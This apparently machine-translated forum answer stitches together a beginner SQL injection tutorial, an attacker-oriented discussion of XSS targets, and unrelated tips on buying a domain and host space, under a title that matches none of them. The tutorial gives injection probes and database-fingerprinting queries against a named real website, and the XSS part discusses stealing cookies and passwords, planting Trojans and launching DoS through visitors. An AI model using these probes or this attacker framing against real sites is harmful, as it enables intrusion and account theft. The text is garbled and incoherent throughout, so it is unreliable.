Comparison of computing power of XSS mainframe

1. With the development of B / S mode application development, more and more programmers use this mode to write applications. However, e to the entry threshold of this instry is not high, and the level and experience of programmers are also uneven, a considerable number of programmers do not judge the legitimacy of the user's input data when writing code, which makes the application have security risks. The user can submit a database query code and get some data he wants to know according to the results returned by the program. This is called SQL injection, that is, SQL injection. SQL injection is accessed from the normal www port, and it seems to be no different from the general web page access, so the current market firewalls will not alert SQL injection. If the administrator does not have the habit of checking the IIS log, he may not be aware of the intrusion for a long time. However, the method of SQL injection is quite flexible, and there will be many unexpected situations ring the injection. Whether we can analyze the specific situation and construct ingenious SQL statements, so as to successfully obtain the desired data, is the fundamental difference between the expert and the "rookie". According to the national conditions, more than 70% of domestic websites use ASP + access or SQL server, PHP + mysq accounts for L20%, and the others are less than 10%. In this article, we will explain the methods and skills of ASP injection from entry-level, advanced to advanced level. The article of PHP injection is written by Zwell, another friend of Nb alliance. We hope it will be useful for security workers and programmers. For those who know about ASP injection, please don't skip the introctory chapter, because some people have misunderstandings about the basic judgment method of injection. Are you ready? Let' If you haven't tried SQL injection before, the first step is to set ie menu = & gt; Tools = & gt; Internet Options = & gt; Advanced = & gt; The tick before the friendly HTTP error message is removed. Otherwise, no matter what error the server returns, ie will only display as HTTP 500 server error, and can't get more prompt information. The first section, SQL injection principle, the following we from a website www.19cn.com Start (Note: This article has been approved by the webmaster before publication, most of which are real data). On the home page of the website, there is a link named "multiple solutions for IE can't open a new window". The address is: http://www.19cn.com/showdetail.asp?id=49 The server will return the following error prompt: Microsoft Jet database engine error; 80040e14' The syntax error of string is in the query expression; ID=49'&# 39; In the middle/ Showdetail.asp, line 8 from this error prompt, we can see the following points: 1. The website uses the access database, connecting to the database through jet engine, not through ODBC. 2. The program does not judge whether the data submitted by the client meets the program requirements. 3. There is a field named ID in the table queried by the SQL statement. From the above example, we can see that the principle of SQL injection is to submit special code from the client, so as to collect the information of the program and the server, so as to obtain the information you want. Section 2: judge whether SQL injection can be carried out. After reading section 1, some people will think: I often test whether SQL injection can be carried out in this way, isn't it very simple? In fact, this is not the best way. Why? First of all, not necessarily every server's IIS will return a specific error prompt to the client. If a cint (parameter) and other statements are added to the program, SQL injection will not succeed, but the server will also report an error. The specific prompt is an error on the server when processing the URL. Please contact the system administrator. Secondly, some programmers who know a little bit about SQL injection think that it is safe to filter out single quotation marks. This is not rare. If you use single quotation marks to test, you can't detect the injection point. So, what kind of test method is more accurate? The answers are as follows: 1 http://www.19cn.com/showdetail.asp?id=49 ② http://www.19cn.com/showdetail.asp?id=49 and 1=1 ③ http://www.19cn.com/showdetail.asp?id=49 And 1 = 2 this is the classic 1 = 1, 1 = 2 test method, how to judge? If you look at the results returned by the above three URLs, you will know: the performance that can be injected: ① normal display (this is inevitable, otherwise there is an error in the program); ② normal display, the content is basically the same as that of ①; ③ prompt BOF or EOF (when the program does not make any judgment), or prompt that no record can be found (when rs.eof is judged) Or the display content is empty (the program added on error resume next) and can't be injected, so it's easier to judge. ① is also displayed normally. ② and ③ generally have program defined error prompt or prompt type conversion error. Of course, this is only the judgment method used when the incoming parameters are numeric. In practical application, there will be character type and search type parameters. I will analyze them in "general steps of SQL Injection" in the intermediate chapter. Section 3, judge the database type and injection method. Different database functions and injection methods are different, so before injection, we have to judge the database type. Generally, access and SQL server are the most frequently used databases in ASP, and more than 99% of the websites on the Internet are among them. How can a program tell you what database it uses? Let's take a look: SQL server has some system variables. If the server IIS prompt is not turned off and SQL server returns an error prompt, you can get it directly from the error information. The method is as follows: http://www.19cn.com/showdetail.asp?id=49 and user> This sentence is very simple, but it contains the essence of SQL Server's unique injection method. I also found this highly efficient guessing method in an unintentional test. Let me see what it means: first of all, the previous statement is normal, focusing on and user & gt; 0. As we know, user is a built-in variable of SQL server. Its value is the user name of the current connection and its type is nvarchar. Compare the value of nvarchar with the number 0 of int. the system will first try to convert the value of nvarchar to int. of course, there will be errors in the process of conversion. The error prompt of SQL server is: syntax error occurs when converting nvarchar value "ABC" to column with data type of int. ha ha, ABC is the value of variable user. In this way, you can get the user name of the database without wasting your efforts. In the future, you will see a lot of sentences in this way. By the way, as we all know, SQL Server User SA is the same role as adminstrators permission. If you get SA permission, you can almost certainly get the administrator of the host. The above method is very convenient to test whether to log in with SA. It should be noted that if it is sa log in, the prompt is that there is an error in converting "dbo" to int column, not "Sa". If IIS does not allow the server to return an error prompt, how do you determine the database type? We can start from the difference between access and SQL server. Both access and SQL server have their own system tables, such as the table where all objects in the database are stored. Access is in the system table [msysobjects], but reading the table in the web environment will prompt "no permission". SQL server is in the table [sysobjects], which can be read normally in the web environment. To confirm that it can be injected, use the following statement: http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from sysobjects)> 0 http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from msysobjects)> 0 if the database is SQL server, then the page of the first web address is the same as the original page http://www.19cn.com/showdetail.asp?id=49 It's about the same; The second web address, because the table msysobjects cannot be found, will prompt an error. Even if the program has fault tolerance processing, the page is completely different from the original page. If the database uses access, then the situation is different. The first web page is completely different from the original page; The second web address depends on whether the database setting allows reading the system table. Generally speaking, it is not allowed, so it is completely different from the original web address. In most cases, the first web address can be used to know the database type used by the system, and the second web address is only used to verify when IIS error prompt is turned on

2. 1. So this kind of website must be game website, bank website, QQ, Taobao or influential website. They must have the account password that we usually need to steal; Of course, maybe this site has a high number of views, we can hang more horses out. And if it's just a common XSS vulnerability of a small site, if we want to hang up, then it's better to directly post the address of the Trojan page. 2. Users must have members to operate this kind of website under their authority, and these members have many meaningful operations or internal personal data that we need, so we can operate the logged in visitors with authority through XSS. I think the stealing of cookies should be counted as this item, because its purpose is also to obtain the user's operation permission (including stealing password), so as to obtain some information of the user or carry out relevant operations under the permission. 3. DOS attack or puppet machine, which also requires a very large number of visits to the site, the use of small sites as our own attack or access to information. We can use this page to visit the user uninterrupted attack other sites, or LAN scanning and so on. This kind of JS tools have been proced for a long time, such as JS port scanning, jikto, xssshell and so on. 4. Generally speaking, this mainly occurs in the forum or information management system. In short, there must be an administrator. This requires the attacker to be quite familiar with the target system (generally, such a system needs open source code), so that he can know how to construct a statement to claim power. 5. To achieve special effects, such as the insertion of video in the network space, insert the block; For example, some people in Sina blog or campus network to achieve special effects and so on. Conclusion: so you should understand the nature of these websites: high traffic, members, administrators, valuable account passwords, or meaningful implementation of special effects. If you have read Ajax hacking with XSS, you should know that XSS includes at least seven ways, such as input XSS and textarea XSS. Among them, URL XSS belongs to input XSS, and most of these vulnerabilities belong to reserved XSS, while textarea XSS generally belong to non reserved XSS. This means that normal access to a page will not trigger retained XSS, although this is a vulnerability of most websites, and the search part is also called search XSS vulnerability. So when you get an input XSS, you just alert a small box. You brag with others, you find a loophole, and you can alert him a frame, but in fact you can't do anything. Even if you can hang some small Trojans, it's meaningless - because you might as well send XSS pages to others directly in your own virtual host. This is different from SQL injection. After all, XSS is a client thing. The purpose of SQL injection is often to get the permission of the target system, and the SQL statement itself is the instruction of the server; But XSS is generally to get things from the client and execute the client's instructions. So they can "& Yell "something's wrong", but you can't yell because "alert" is out of "XSS window"

seek adoption

3. A website should at least include the domain name and the host space. The domain name is usually said to be the web address, and the space is used to put web files
1. Apply for a domain name: the domain name should be easy to remember and understand. The shorter the domain name, the better. It can be English or Chinese Pinyin of your brand name
2. Apply for host space: if you can design web pages with software such as DW, use virtual host; If you don't know how to design a website, you can do it by typing. It's easy to operate and powerful. You can try it for free
note: domestic hosts can only be accessed with your own domain name after they are successfully registered, and it generally takes about 10 working days for the website to be registered; Personal website after filing, can not put enterprise or proct content. The international version of the express website does not need to be filed and is not subject to filing restrictions
I hope I can help you. Please add me.